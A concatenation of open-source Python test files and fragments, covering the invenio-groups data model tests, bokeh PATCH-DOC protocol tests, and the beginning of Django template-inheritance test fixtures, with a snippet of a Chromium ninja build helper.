# TODO(iancottrell): If we can't detect ninja, we should be disabled.
ninja_binaries = cr.Host.SearchPath('ninja')
if ninja_binaries:
cls.DETECTED.Set(NINJA_BINARY=ninja_binaries[0])
NinjaBuilder.DetectNinja()
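# NOTE(editor): illustrative note -- with the ENABLED defaults above, Build()
# effectively invokes something like:
#   ninja -C<CR_BUILD_DIR> -j200 -l12 <build targets...>
# where the -j/-l values come from NINJA_JOBS and NINJA_PROCESSORS.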
| bsd-3-clause |
egabancho/invenio-groups | tests/test_models.py | 2 | 25711 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Test groups data models."""
from __future__ import absolute_import, print_function, unicode_literals
from invenio.ext.sqlalchemy import db
from invenio.testsuite import InvenioTestCase, make_test_suite, run_test_suite
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import FlushError, NoResultFound
class BaseTestCase(InvenioTestCase):
"""Base test case."""
def setUp(self):
"""Clear tables."""
from invenio_groups.models import Group, Membership, GroupAdmin
from invenio_accounts.models import User
Membership.query.delete()
GroupAdmin.query.delete()
Group.query.delete()
User.query.filter(User.id != 1).delete()
db.session.commit()
def tearDown(self):
"""Expunge session."""
db.session.expunge_all()
class SubscriptionPolicyTestCase(BaseTestCase):
"""Test SubscriptionPolicy class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import SubscriptionPolicy
self.assertTrue(SubscriptionPolicy.validate(SubscriptionPolicy.OPEN))
self.assertTrue(SubscriptionPolicy.validate(
SubscriptionPolicy.APPROVAL))
self.assertTrue(SubscriptionPolicy.validate(SubscriptionPolicy.CLOSED))
self.assertFalse(SubscriptionPolicy.validate("INVALID"))
def test_describe(self):
"""Test policy describe."""
from invenio_groups.models import SubscriptionPolicy
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.OPEN))
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.APPROVAL))
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.CLOSED))
self.assertIsNone(SubscriptionPolicy.describe("INVALID"))
class PrivacyPolicyTestCase(BaseTestCase):
"""Test PrivacyPolicy class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import PrivacyPolicy
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.PUBLIC))
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.MEMBERS))
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.ADMINS))
self.assertFalse(PrivacyPolicy.validate("INVALID"))
def test_describe(self):
"""Test policy describe."""
from invenio_groups.models import PrivacyPolicy
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.PUBLIC))
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.MEMBERS))
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.ADMINS))
self.assertIsNone(PrivacyPolicy.describe("INVALID"))
class MembershipState(BaseTestCase):
"""Test MembershipState class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import MembershipState
self.assertTrue(MembershipState.validate(
MembershipState.PENDING_ADMIN))
self.assertTrue(MembershipState.validate(
MembershipState.PENDING_USER))
self.assertTrue(MembershipState.validate(MembershipState.ACTIVE))
self.assertFalse(MembershipState.validate("INVALID"))
class GroupTestCase(BaseTestCase):
"""Test Group data model api."""
def test_creation(self):
"""Test creation of groups."""
from invenio_groups.models import Group, \
GroupAdmin, Membership, SubscriptionPolicy, PrivacyPolicy
g = Group.create(name="test")
self.assertEqual(g.name, 'test')
self.assertEqual(g.description, '')
self.assertEqual(g.subscription_policy, SubscriptionPolicy.CLOSED)
self.assertEqual(g.privacy_policy, PrivacyPolicy.ADMINS)
self.assertEqual(g.is_managed, False)
assert g.created
assert g.modified
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 0)
g2 = Group.create(
name="admintest",
description="desc",
subscription_policy=SubscriptionPolicy.OPEN,
privacy_policy=PrivacyPolicy.PUBLIC,
is_managed=True,
admins=[g]
)
self.assertEqual(g2.name, 'admintest')
self.assertEqual(g2.description, 'desc')
self.assertEqual(g2.subscription_policy, SubscriptionPolicy.OPEN)
self.assertEqual(g2.privacy_policy, PrivacyPolicy.PUBLIC)
self.assertEqual(g2.is_managed, True)
assert g2.created
assert g2.modified
self.assertEqual(GroupAdmin.query.count(), 1)
admin = g2.admins[0]
self.assertEqual(admin.admin_type, 'Group')
self.assertEqual(admin.admin_id, g.id)
self.assertEqual(Membership.query.count(), 0)
def test_creation_existing_name(self):
"""Test what happens if group with identical name is created."""
from invenio_groups.models import Group
g = Group.create(name="test", )
self.assertRaises(
IntegrityError,
Group.create, name="test", admins=[g])
def test_creation_signals(self):
"""Test signals sent after creation."""
from invenio_groups.models import Group
from invenio_groups.signals import group_created
Group.called = False
def _receiver(sender=None, group=None):
Group.called = True
assert sender == Group
assert group.name == 'signaltest'
with group_created.connected_to(_receiver):
Group.create(name="signaltest")
assert Group.called
Group.called = False
with group_created.connected_to(_receiver):
self.assertRaises(IntegrityError, Group.create, name="signaltest")
assert not Group.called
def test_creation_invalid_data(self):
"""Test what happens if group with invalid data is created."""
from invenio_groups.models import Group
self.assertRaises(
AssertionError,
Group.create, name="")
self.assertRaises(
AssertionError,
Group.create, name="test", privacy_policy='invalid')
self.assertRaises(
AssertionError,
Group.create, name="test", subscription_policy='invalid')
self.assertEqual(Group.query.count(), 0)
def test_delete(self):
"""Test deletion of a group."""
from invenio_groups.models import Group, GroupAdmin, Membership
from invenio_accounts.models import User
g1 = Group.create(name="test1")
g2 = Group.create(name="test2", admins=[g1])
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
g2.add_member(u)
# Group is admin of another group, which will be left without admins
g1.delete()
self.assertEqual(Group.query.count(), 1)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 1)
g2.delete()
self.assertEqual(Group.query.count(), 0)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 0)
def test_update(self):
"""."""
from invenio_groups.models import Group, SubscriptionPolicy, \
PrivacyPolicy
g = Group.create(name="test")
m = g.modified
g.update(
name="test-change",
description="changed",
subscription_policy=SubscriptionPolicy.OPEN,
privacy_policy=PrivacyPolicy.MEMBERS,
is_managed=True,
)
self.assertEqual(g.name, 'test-change')
self.assertEqual(g.description, 'changed')
self.assertEqual(g.subscription_policy, SubscriptionPolicy.OPEN)
self.assertEqual(g.privacy_policy, PrivacyPolicy.MEMBERS)
self.assertTrue(g.is_managed)
self.assertIsNot(m, g.modified)
assert g.created
def test_update_duplicated_names(self):
"""."""
from invenio_groups.models import Group
g = Group.create(name="test")
Group.create(name="test-change")
self.assertEqual(Group.query.count(), 2)
self.assertRaises(
IntegrityError,
g.update, name="test-change")
def test_get_by_name(self):
"""Test get by name."""
from invenio_groups.models import Group
Group.create(name="test1")
Group.create(name="test2")
self.assertEqual(Group.get_by_name("test1").name, "test1")
self.assertIsNone(Group.get_by_name("invalid"),)
def test_query_by_names(self):
"""Test query by names."""
from invenio_groups.models import Group
from flask.ext.sqlalchemy import BaseQuery
Group.create(name="test1")
Group.create(name="test2")
Group.create(name="test3")
self.assertRaises(
AssertionError,
Group.query_by_names, 'test1')
self.assertIsInstance(Group.query_by_names(['test']), BaseQuery)
self.assertEqual(Group.query_by_names(["invalid"]).count(), 0)
self.assertEqual(Group.query_by_names(["test1"]).count(), 1)
self.assertEqual(Group.query_by_names(["test2", "invalid"]).count(), 1)
self.assertEqual(Group.query_by_names(["test1", "test2"]).count(), 2)
self.assertEqual(Group.query_by_names([]).count(), 0)
def test_query_by_user(self):
"""."""
from invenio_groups.models import Group, Membership, \
GroupAdmin, MembershipState
from invenio_accounts.models import User
u1 = User(email="test1@test1.test1", password="test1")
u2 = User(email="test2@test2.test2", password="test2")
u3 = User(email="test3@test3.test3", password="test3")
db.session.add(u1)
db.session.add(u2)
db.session.add(u3)
db.session.commit()
g1 = Group.create(name="test1", admins=[u1])
g2 = Group.create(name="test2", admins=[u1])
g1.add_member(u2, state=MembershipState.PENDING_ADMIN)
g1.add_member(u3, state=MembershipState.ACTIVE)
g2.add_member(u2, state=MembershipState.ACTIVE)
self.assertEqual(Group.query.count(), 2)
self.assertEqual(GroupAdmin.query.count(), 2)
self.assertEqual(Membership.query.count(), 3)
self.assertEqual(Group.query_by_user(u1).count(), 2)
self.assertEqual(Group.query_by_user(u1, with_pending=True).count(), 2)
self.assertEqual(Group.query_by_user(u2).count(), 1)
self.assertEqual(Group.query_by_user(u2, with_pending=True).count(), 2)
self.assertEqual(Group.query_by_user(u3).count(), 1)
self.assertEqual(Group.query_by_user(u3, with_pending=True).count(), 1)
self.assertEqual(Group.query_by_user(
u3, with_pending=True, eager=[Group.members]).count(), 1)
def test_add_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
obj = g.add_admin(a)
self.assertIsInstance(obj, GroupAdmin)
self.assertEqual(GroupAdmin.query.count(), 1)
self.assertRaises(
IntegrityError,
g.add_admin, a)
def test_remove_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertEqual(GroupAdmin.query.count(), 1)
g.remove_admin(a)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertRaises(
NoResultFound,
g.remove_admin, a)
def test_add_member(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test1")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
obj = g.add_member(u)
self.assertIsInstance(obj, Membership)
self.assertEqual(Group.query.count(), 1)
self.assertEqual(Membership.query.count(), 1)
self.assertRaises(
FlushError,
g.add_member, u)
def test_remove_member(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test1")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
g.add_member(u)
self.assertEqual(Membership.query.count(), 1)
g.remove_member(u)
self.assertEqual(Membership.query.count(), 0)
self.assertIsNone(g.remove_member(u))
def test_invite(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
u2 = User(email="test", password="test")
db.session.add(u)
db.session.add(u2)
db.session.commit()
m = g.invite(u)
self.assertEqual(Membership.query.count(), 1)
self.assertEqual(m.state, MembershipState.PENDING_USER)
a = Group.create(name="admin")
g2 = Group.create(name="test2", admins=[a])
self.assertIsNone(g2.invite(u2, admin=g))
m = g2.invite(u2, admin=a)
self.assertEqual(Membership.query.count(), 2)
self.assertEqual(m.state, MembershipState.PENDING_USER)
def test_subscribe(self):
"""."""
from invenio_groups.models import Group, SubscriptionPolicy, \
Membership, MembershipState
from invenio_accounts.models import User
g_o = Group.create(name="test_open",
subscription_policy=SubscriptionPolicy.OPEN)
g_a = Group.create(name="test_approval",
subscription_policy=SubscriptionPolicy.APPROVAL)
g_c = Group.create(name="test_closed",
subscription_policy=SubscriptionPolicy.CLOSED)
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
m_o = g_o.subscribe(u)
m_c = g_c.subscribe(u)
m_a = g_a.subscribe(u)
self.assertIsNone(m_c,)
self.assertEqual(m_a.state, MembershipState.PENDING_ADMIN)
self.assertEqual(m_o.state, MembershipState.ACTIVE)
self.assertEqual(Membership.query.count(), 2)
def test_is_admin(self):
"""."""
from invenio_groups.models import Group
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
g.add_admin(u)
self.assertTrue(g.is_admin(u))
a = Group.create(name="admin")
g = Group.create(name="test2", admins=[a])
self.assertTrue(g.is_admin(a))
def test_is_member(self):
"""."""
from invenio_groups.models import Group
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
g.add_member(u)
self.assertTrue(g.is_member(u))
class MembershipTestCase(BaseTestCase):
"""Test of membership data model."""
def test_create(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u)
self.assertEqual(m.state, MembershipState.ACTIVE)
self.assertEqual(m.group.name, g.name)
self.assertEqual(m.user.id, u.id)
self.assertRaises(
FlushError,
Membership.create, g, u)
def test_delete(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
Membership.create(g, u)
self.assertEqual(Membership.query.count(), 1)
Membership.delete(g, u)
self.assertEqual(Membership.query.count(), 0)
self.assertIsNone(Membership.delete(g, u))
def test_get(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test")
db.session.add(u)
db.session.add(u2)
db.session.commit()
Membership.create(g, u)
m = Membership.get(g, u)
m2 = Membership.get(g, u2)
self.assertEqual(m.group.id, g.id)
self.assertEqual(m.user.id, u.id)
self.assertIsNone(m2)
def test_query_by_user(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add(u)
db.session.add(u2)
db.session.commit()
Membership.create(g, u, MembershipState.ACTIVE)
self.assertIsInstance(Membership.query_by_user(u), BaseQuery)
self.assertEqual(Membership.query_by_user(u).count(), 1)
self.assertEqual(Membership.query_by_user(u2).count(), 0)
def test_query_invitations(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
u1 = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
u3 = User(email="test3@test3.test3", password="test3")
db.session.add_all([u1, u2, u3])
db.session.commit()
Membership.create(g, u1, MembershipState.ACTIVE)
Membership.create(g, u2, MembershipState.PENDING_USER)
Membership.create(g, u3, MembershipState.PENDING_ADMIN)
self.assertIsInstance(Membership.query_by_user(u1), BaseQuery)
self.assertEqual(Membership.query_invitations(u1).count(), 0)
self.assertEqual(Membership.query_invitations(u2).count(), 1)
self.assertEqual(Membership.query_invitations(u3).count(), 0)
def test_query_requests(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
a = User(email="admin@admin.admin", password="admin")
u1 = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add_all([a, u1, u2])
db.session.commit()
g = Group.create(name="test", admins=[a])
Membership.create(g, u1, MembershipState.PENDING_ADMIN)
Membership.create(g, u2, MembershipState.PENDING_USER)
self.assertIsInstance(Membership.query_requests(u1), BaseQuery)
self.assertEqual(Membership.query_requests(a).count(), 1)
ad = Group.create(name="admin")
g2 = Group.create(name="test2", admins=[ad])
u3 = User(email="test3@test3.test3", password="test3")
u4 = User(email="test4@test4.test4", password="test4")
u5 = User(email="test5@test5g.test5", password="test5")
db.session.add_all([u3, u4, u5])
db.session.commit()
Membership.create(ad, u3, MembershipState.ACTIVE)
Membership.create(g2, u4, MembershipState.PENDING_ADMIN)
Membership.create(g2, u5, MembershipState.PENDING_USER)
self.assertEqual(Membership.query_requests(u3).count(), 1)
def test_query_by_group(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
Group.create(name="test2")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add(u)
db.session.commit()
Membership.create(g, u, MembershipState.ACTIVE)
self.assertIsInstance(Membership.query_by_group(g), BaseQuery)
self.assertEqual(Membership.query_by_group(g).count(), 1)
self.assertEqual(Membership.query_by_group(u2).count(), 0)
def test_accept(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u, MembershipState.PENDING_ADMIN)
m.accept()
self.assertEqual(m.state, MembershipState.ACTIVE)
def test_reject(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u)
m.reject()
self.assertEqual(Membership.query.count(), 0)
class GroupAdminTestCase(BaseTestCase):
"""Test of GroupAdmin data model."""
def test_create(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
ga = GroupAdmin.create(g, a)
self.assertEqual(ga.admin_type, 'Group')
self.assertEqual(ga.admin_id, a.id)
self.assertEqual(ga.group.id, g.id)
self.assertEqual(GroupAdmin.query.count(), 1)
def test_delete(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
ga = GroupAdmin.create(g, a)
self.assertEqual(ga.admin_type, 'Group')
self.assertEqual(ga.admin_id, a.id)
self.assertEqual(ga.group.id, g.id)
self.assertEqual(GroupAdmin.query.count(), 1)
GroupAdmin.delete(g, a)
self.assertEqual(GroupAdmin.query.count(), 0)
def test_query_by_group(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from flask.ext.sqlalchemy import BaseQuery
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
g2 = Group.create(name="test2")
self.assertIsInstance(GroupAdmin.query_by_group(g), BaseQuery)
self.assertEqual(GroupAdmin.query_by_group(g).count(), 1)
self.assertEqual(GroupAdmin.query_by_group(g2).count(), 0)
def test_query_by_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from flask.ext.sqlalchemy import BaseQuery
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertIsInstance(GroupAdmin.query_by_admin(a), BaseQuery)
self.assertEqual(GroupAdmin.query_by_admin(a).count(), 1)
self.assertEqual(GroupAdmin.query_by_admin(g).count(), 0)
def test_query_admins_by_group_ids(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from sqlalchemy.orm.query import Query
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertIsInstance(GroupAdmin.query_admins_by_group_ids([g.id]),
Query)
self.assertEqual(
GroupAdmin.query_admins_by_group_ids([g.id]).count(), 1)
self.assertEqual(
GroupAdmin.query_admins_by_group_ids([a.id]).count(), 0)
self.assertRaises(
AssertionError,
GroupAdmin.query_admins_by_group_ids, 'invalid')
TEST_SUITE = make_test_suite(
SubscriptionPolicyTestCase, PrivacyPolicyTestCase, GroupTestCase,
MembershipTestCase)
if __name__ == "__main__":
run_test_suite(TEST_SUITE)
| gpl-2.0 |
rs2/bokeh | bokeh/protocol/messages/tests/test_patch_doc.py | 4 | 8320 | from __future__ import absolute_import, print_function
import unittest
from json import loads
import pytest
import numpy as np
from bokeh.protocol.messages.patch_doc import process_document_events
import bokeh.document as document
from bokeh.model import Model
from bokeh.models.sources import ColumnDataSource
from bokeh.core.properties import Int, Instance
from bokeh.protocol import Protocol
from bokeh.document.events import ColumnDataChangedEvent, ColumnsPatchedEvent, ColumnsStreamedEvent, ModelChangedEvent, RootAddedEvent, RootRemovedEvent
class AnotherModelInTestPatchDoc(Model):
bar = Int(1)
class SomeModelInTestPatchDoc(Model):
foo = Int(2)
child = Instance(Model)
class TestPatchDocument(unittest.TestCase):
def _sample_doc(self):
doc = document.Document()
another = AnotherModelInTestPatchDoc()
doc.add_root(SomeModelInTestPatchDoc(child=another))
doc.add_root(SomeModelInTestPatchDoc())
return doc
def test_create_no_events(self):
with pytest.raises(ValueError):
Protocol("1.0").create("PATCH-DOC", [])
def test_create_multiple_docs(self):
sample1 = self._sample_doc()
obj1 = next(iter(sample1.roots))
event1 = ModelChangedEvent(sample1, obj1, 'foo', obj1.foo, 42, 42)
sample2 = self._sample_doc()
obj2 = next(iter(sample2.roots))
event2 = ModelChangedEvent(sample2, obj2, 'foo', obj2.foo, 42, 42)
with pytest.raises(ValueError):
Protocol("1.0").create("PATCH-DOC", [event1, event2])
def test_create_model_changed(self):
sample = self._sample_doc()
obj = next(iter(sample.roots))
event = ModelChangedEvent(sample, obj, 'foo', obj.foo, 42, 42)
Protocol("1.0").create("PATCH-DOC", [event])
def test_create_then_apply_model_changed(self):
sample = self._sample_doc()
foos = []
for r in sample.roots:
foos.append(r.foo)
assert foos == [ 2, 2 ]
obj = next(iter(sample.roots))
assert obj.foo == 2
event = ModelChangedEvent(sample, obj, 'foo', obj.foo, 42, 42)
msg = Protocol("1.0").create("PATCH-DOC", [event])
copy = document.Document.from_json_string(sample.to_json_string())
msg.apply_to_document(copy)
foos = []
for r in copy.roots:
foos.append(r.foo)
foos.sort()
assert foos == [ 2, 42 ]
def test_patch_event_contains_setter(self):
sample = self._sample_doc()
root = None
other_root = None
for r in sample.roots:
if r.child is not None:
root = r
else:
other_root = r
assert root is not None
assert other_root is not None
new_child = AnotherModelInTestPatchDoc(bar=56)
cds = ColumnDataSource(data={'a': np.array([0., 1., 2.])})
sample.add_root(cds)
mock_session = object()
def sample_document_callback_assert(event):
"""Asserts that setter is correctly set on event"""
assert event.setter is mock_session
sample.on_change(sample_document_callback_assert)
# Model property changed
event = ModelChangedEvent(sample, root, 'child', root.child, new_child, new_child)
msg = Protocol("1.0").create("PATCH-DOC", [event])
msg.apply_to_document(sample, mock_session)
self.assertEqual(msg.buffers, [])
# RootAdded
event2 = RootAddedEvent(sample, root)
msg2 = Protocol("1.0").create("PATCH-DOC", [event2])
msg2.apply_to_document(sample, mock_session)
self.assertEqual(msg2.buffers, [])
# RootRemoved
event3 = RootRemovedEvent(sample, root)
msg3 = Protocol("1.0").create("PATCH-DOC", [event3])
msg3.apply_to_document(sample, mock_session)
self.assertEqual(msg3.buffers, [])
# ColumnsStreamed
event4 = ModelChangedEvent(sample, cds, 'data', 10, None, None,
hint=ColumnsStreamedEvent(sample, cds, {"a": [3]}, None, mock_session))
msg4 = Protocol("1.0").create("PATCH-DOC", [event4])
msg4.apply_to_document(sample, mock_session)
self.assertEqual(msg4.buffers, [])
# ColumnsPatched
event5 = ModelChangedEvent(sample, cds, 'data', 10, None, None,
hint=ColumnsPatchedEvent(sample, cds, {"a": [(0, 11)]}))
msg5 = Protocol("1.0").create("PATCH-DOC", [event5])
msg5.apply_to_document(sample, mock_session)
self.assertEqual(msg5.buffers, [])
# ColumnDataChanged, use_buffers=False
event6 = ModelChangedEvent(sample, cds, 'data', {'a': np.array([0., 1.])}, None, None,
hint=ColumnDataChangedEvent(sample, cds))
msg6 = Protocol("1.0").create("PATCH-DOC", [event6], use_buffers=False)
msg6.apply_to_document(sample, mock_session)
self.assertEqual(msg6.buffers, [])
print(cds.data)
# ColumnDataChanged, use_buffers=True
event7 = ModelChangedEvent(sample, cds, 'data', {'a': np.array([0., 1.])}, None, None,
hint=ColumnDataChangedEvent(sample, cds))
msg7 = Protocol("1.0").create("PATCH-DOC", [event7])
# can't test apply, doc not set up to *receive* binary buffers
# msg7.apply_to_document(sample, mock_session)
self.assertEqual(len(msg7.buffers), 1)
buf = msg7.buffers.pop()
self.assertEqual(len(buf), 2)
self.assertTrue(isinstance(buf[0], dict))
self.assertTrue(list(buf[0]) == ['id'])
        # reports the CDS buffer *as it is*. Normally events are fired by the setter
        # and the value in the local object would already have been mutated.
self.assertEqual(buf[1], np.array([11., 1., 2., 3]).tobytes())
class _Event(object):
def __init__(self, refs, bufs):
self.refs=refs
self.bufs=bufs
def generate(self, refs, bufs):
refs.update(self.refs)
if bufs is not None:
bufs.extend(self.bufs)
return "junk"
class _M(Model):
pass
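# Editor's note (added comment, not part of the original test module): _Event and _M
# above are minimal stand-ins for real document events and models. _Event mimics the
# event contract exercised by process_document_events -- generate(references, buffers)
# merges its model references into the shared collection, appends any binary buffers
# when a buffer list is supplied, and returns the serialized event payload ("junk"
# here). _M is an empty Model used only to populate the 'references' section of the
# resulting JSON.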
def test_process_document_events_no_refs():
e = _Event([], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_with_refs():
e = _Event([_M(),_M()], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 2
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_no_buffers():
e = _Event([], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_with_buffers():
e = _Event([], [1,2])
r, bufs = process_document_events([e])
assert bufs == [1, 2]
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_mixed():
e1 = _Event([], [1,2])
e2 = _Event([_M(),_M(),_M()], [3,4, 5])
e3 = _Event([_M(),_M()], [])
r, bufs = process_document_events([e1, e2, e3])
assert bufs == [1, 2, 3, 4, 5]
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 5
assert len(json['events']) == 3
assert json['events'] == ['junk', 'junk', 'junk']
def test_process_document_events_with_buffers_and_use_buffers_false():
e = _Event([], [1,2])
r, bufs = process_document_events([e], use_buffers=False)
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
| bsd-3-clause |
double-y/django | tests/template_tests/syntax_tests/test_extends.py | 86 | 15503 | from django.test import SimpleTestCase
from ..utils import setup
inheritance_templates = {
'inheritance01': "1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}",
'inheritance02': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance03': "{% extends 'inheritance02' %}",
'inheritance04': "{% extends 'inheritance01' %}",
'inheritance05': "{% extends 'inheritance02' %}",
'inheritance06': "{% extends foo %}",
'inheritance07': "{% extends 'inheritance01' %}{% block second %}5{% endblock %}",
'inheritance08': "{% extends 'inheritance02' %}{% block second %}5{% endblock %}",
'inheritance09': "{% extends 'inheritance04' %}",
'inheritance10': "{% extends 'inheritance04' %} ",
'inheritance11': "{% extends 'inheritance04' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance12': "{% extends 'inheritance07' %}{% block first %}2{% endblock %}",
'inheritance13': "{% extends 'inheritance02' %}"
"{% block first %}a{% endblock %}{% block second %}b{% endblock %}",
'inheritance14': "{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}",
'inheritance15': "{% extends 'inheritance01' %}"
"{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}",
'inheritance16': "{% extends 'inheritance15' %}{% block inner %}out{% endblock %}",
'inheritance17': "{% load testtags %}{% block first %}1234{% endblock %}",
'inheritance18': "{% load testtags %}{% echo this that theother %}5678",
'inheritance19': "{% extends 'inheritance01' %}"
"{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}",
'inheritance20': "{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance21': "{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance22': "{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance23': "{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}",
'inheritance24': "{% extends context_template %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance25': "{% extends context_template.1 %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance26': "no tags",
'inheritance27': "{% extends 'inheritance26' %}",
'inheritance 28': "{% block first %}!{% endblock %}",
'inheritance29': "{% extends 'inheritance 28' %}",
'inheritance30': "1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance31': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance32': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance33': "1{% ifequal optional 1 %}{% block opt %}2{% endblock %}{% endifequal %}3",
'inheritance34': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance35': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance36': "{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_",
'inheritance37': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance38': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance39': "{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance40': "{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance41': "{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}",
